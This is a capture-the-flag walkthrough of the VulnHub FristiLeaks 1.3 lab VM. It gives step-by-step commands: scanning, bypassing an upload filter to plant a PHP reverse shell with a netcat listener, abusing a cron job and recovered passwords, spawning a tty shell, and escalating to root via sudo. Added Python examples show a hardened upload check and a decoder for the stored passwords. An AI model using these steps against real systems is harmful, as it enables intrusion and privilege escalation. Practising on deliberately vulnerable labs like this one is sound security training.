[VULNHUB] FristiLeaks: 1.3

Second VM of my OSCP series. It is really really awesome.

DIRECTORY NAME TOO GUESSABLE

Start with an nmap scan:

nmap 192.168.1.23 -sV -p 1-65535 -T 4

This is the result:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 12:45 CET
Nmap scan report for 192.168.1.23
Host is up (0.012s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.59 seconds

So there is only a web server running on port 80. Now let’s scan the service with nikto:

nikto -h 192.168.1.23

This is the output:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-11-24 12:45:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 19:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2016-11-24 12:46:36 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So there are a few entries in /robots.txt that I need to check. The home page of the web site is a welcome page of the VM. So I opened the robots.txt file:

User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

I checked these three directories but in every one of them there was an image saying that it wasn’t the directory I was looking for. I tried some brute-force directory discovery without success, then I tried guessing some names and /fristi worked! A login form appeared and I checked the source code, where I found this comment:

TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Also there was a meta tag with the following phrase:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Ok, there is some information to discover here. Looking more closely at the source code I found a long base64-encoded string:


Let’s decode that. First of all I saved the string into a file called base64_password, then I had to remove the newlines from it and decode it, so I typed:

tr -d '\n' < base64_password | base64 -d > decoded_password

I didn’t know which type of file I had decoded, whether it was text or an image, so I checked it with this:

file decoded_password

This is the output:

decoded_password: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced

Nice, now I renamed it, adding the .png extension. This is the content of the image:

keKkeKKeKKeKkEkkEk

So I have the password but I need a username. I remembered that the comment in the HTML page was signed by a user, eezeepz. So I tried to log in with these credentials and it worked. Then I clicked on the only link in the page, which redirected me to an upload form.

FIX THIS UPLOAD FORM

Only images were allowed. So I used Burp Suite to upload a .php reverse shell: I changed the extension to .php.gif, I edited the Content-Type to image/gif and finally I added the GIF89a; header. This was the output of the upload form:

Uploading, please wait
The file has been uploaded to /uploads

So I started listening locally:

nc -lvp 1234

And then I browsed to http://192.168.1.23/fristi/uploads/php-reverse-shell.php.gif. Now I have a reverse shell and I need to elevate my privileges to become root.
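Why the renamed upload above passed the image filter, and what a stricter server-side check looks like: an added Python example, not code from the VM or from this post. The sample upload tuple, the allowlist, the placeholder storage name and both check functions are assumptions constructed for illustration.

```python
import os

# Constructed sample describing the upload from the walkthrough:
# (client filename, client Content-Type, first bytes of the body).
# The body is a stand-in; only the "GIF89a;" prefix matters here.
SAMPLE_UPLOAD = ("php-reverse-shell.php.gif", "image/gif",
                 b"GIF89a;<?php /* script body omitted in this example */ ?>")

# Allowlist of final extensions and the magic bytes each must start with.
ALLOWED = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}

def naive_is_image(filename, content_type, data):
    """A filter of the kind the walkthrough defeats (hypothetical): it trusts
    the client's Content-Type, accepts an image extension anywhere in the
    name and only glances at the magic bytes. The uploader controls all
    three, so the renamed shell satisfies every test."""
    has_image_ext = any(ext in filename.lower() for ext in ALLOWED)
    return (content_type.startswith("image/") and has_image_ext
            and data.startswith(b"GIF8"))

def strict_accept(filename, content_type, data, server_name="f3a1c2"):
    """Hardened check (an assumption, not the VM's code). Returns the
    server-chosen storage name, or None to reject:
    - the client's Content-Type is ignored entirely;
    - only the final extension counts and it must be on the allowlist;
    - a second extension in the stem is refused, because Apache's mod_mime
      looks at every extension in a name, so with the usual AddHandler for
      PHP a file called x.php.gif is still run as PHP (what happened here);
    - the magic bytes must agree with that extension;
    - the stored name is generated server-side, never taken from the client."""
    del content_type  # untrusted, deliberately unused
    stem, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED or "." in stem:
        return None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return None
    return server_name + ext  # e.g. "f3a1c2.gif"

if __name__ == "__main__":
    print("naive filter accepts the shell:", naive_is_image(*SAMPLE_UPLOAD))
    print("strict filter stores it as:", strict_accept(*SAMPLE_UPLOAD))
```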

FRISTI, I PWN YOU!

First of all I ran the command id to check who I was (apache user), then I started to look around. Browsing into /var/www I found notes.txt:

hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

Then I changed directory to /home and I discovered three users:
– admin
– eezeepz
– fristigod

I could read only the eezeepz home folder, so I listed the files inside it:

drwx---r-x. 5 eezeepz eezeepz  12K Nov 18  2015 .
drwxr-xr-x. 5 root    root    4.0K Nov 19  2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .Old
-rw-r--r--. 1 eezeepz eezeepz   18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz  176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz  124 Sep 22  2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24K Nov 17  2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6.9K Nov 17  2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56K Nov 17  2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52K Nov 17  2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  32K Nov 17  2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48K Nov 17  2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53K Nov 17  2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 127K Nov 17  2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38K Nov 17  2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5.3K Nov 17  2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41K Nov 17  2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz  15K Nov 17  2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7.8K Nov 17  2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz  17K Nov 17  2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 168K Nov 17  2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5.4K Nov 17  2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 121K Nov 17  2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 nologin
-r--r--r--. 1 eezeepz eezeepz  514 Nov 18  2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 382K Nov 17  2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 244K Nov 17  2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51K Nov 17  2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  13K Nov 17  2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21K Nov 17  2015 true
-rwxr-xr-x. 1 eezeepz eezeepz  35K Nov 17  2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  16K Nov 17  2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 493K Nov 17  2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   62 Nov 17  2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 zic

There was a notes.txt so I read it:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Nice! The chmod binary was present in /home/admin so I typed:

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis

After a minute I got access to the admin folder, so I changed directory to it and listed the files again:

-rwxr-xr-x 1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x 1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r-- 1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r-- 1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r-- 1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x 1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x 1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x 1 admin     admin      85304 Nov 18  2015 ps
-rw-rw-rw- 1 apache    apache        35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

There were a lot of interesting files. I printed them to the terminal. This is cryptedpass.txt:

mVGZ3O3omkJLmy2pcuTq

This is cryptpass.py:

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

And then whoisyourgodnow.txt:

=RFn0AKnlMHMPIzpyuTI0ITG

Analyzing the python script I can see that the input string is first encoded in base64, then reversed and finally encoded with the ROT13 algorithm. So I opened the python interpreter in my terminal and I typed:

import base64, codecs
encoded = 'mVGZ3O3omkJLmy2pcuTq'
decoded = codecs.decode(encoded, 'rot13')   # undo the ROT13 step
decoded = decoded[::-1]                     # undo the reversal
print(base64.b64decode(decoded).decode())   # undo the base64 step

That was the output:

thisisalsopw123

I did the same with the second encoded string and I got:

LetThereBeFristi!
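The encode/decode scheme worked through above, as an added Python 3 example that is not part of the original post: it ports encodeString from cryptpass.py, inverts it, and round-trips both strings found in /home/admin. The function names are mine; the two encoded strings are the ones from the page.

```python
import base64
import codecs

# The two encoded strings found in /home/admin on the VM (from the post).
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"       # cryptedpass.txt
WHOISYOURGOD = "=RFn0AKnlMHMPIzpyuTI0ITG"  # whoisyourgodnow.txt

def encode_string(plain):
    """Python 3 port of encodeString() in cryptpass.py: base64, reverse, ROT13."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")

def decode_string(crypted):
    """Undo the three steps in reverse order: ROT13 (its own inverse), reverse,
    base64. ROT13 leaves digits, '+', '/' and '=' untouched, which is why the
    '=' padding of whoisyourgodnow.txt shows up at the front of the stored text."""
    b64 = codecs.decode(crypted, "rot13")[::-1]
    return base64.b64decode(b64).decode()

def recover_all():
    """Decode both stored strings and check that re-encoding reproduces them."""
    found = {}
    for name, crypted in (("cryptedpass.txt", CRYPTEDPASS),
                          ("whoisyourgodnow.txt", WHOISYOURGOD)):
        plain = decode_string(crypted)
        if encode_string(plain) != crypted:
            raise ValueError(f"round trip failed for {name}")
        found[name] = plain
    return found

if __name__ == "__main__":
    for name, plain in recover_all().items():
        print(f"{name}: {plain}")
```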

Ok, so I tried to change user to fristigod but I received the following error:

standard in must be a tty

So I need a TTY shell. I used python to achieve this:

python -c 'import pty; pty.spawn("/bin/bash")'

Then I changed the user with:

su fristigod

And I used LetThereBeFristi! as the password and it worked. Now I looked for sudo programs that could be run by the user:

sudo -l

And I discovered that:

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

It seems that there is a hidden directory with a strange binary. I changed directory to /var/fristigod and I listed the files:

-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  3 fristigod fristigod 4.0K Nov 23 14:55 .secret_admin_stuff

Let’s take a look into .bash_history:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Ok, it seems that doCom executes commands as root, but I need to run it as user fristi. So I browsed into the .secret_admin_stuff directory and I typed:

sudo -u fristi ./doCom chmod -R 777 /root

I used LetThereBeFristi! as the sudo password. Now I have full access to the /root directory. I browsed into it, listed the files and printed fristileaks_secrets.txt to the terminal:

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

VM rooted and completed!
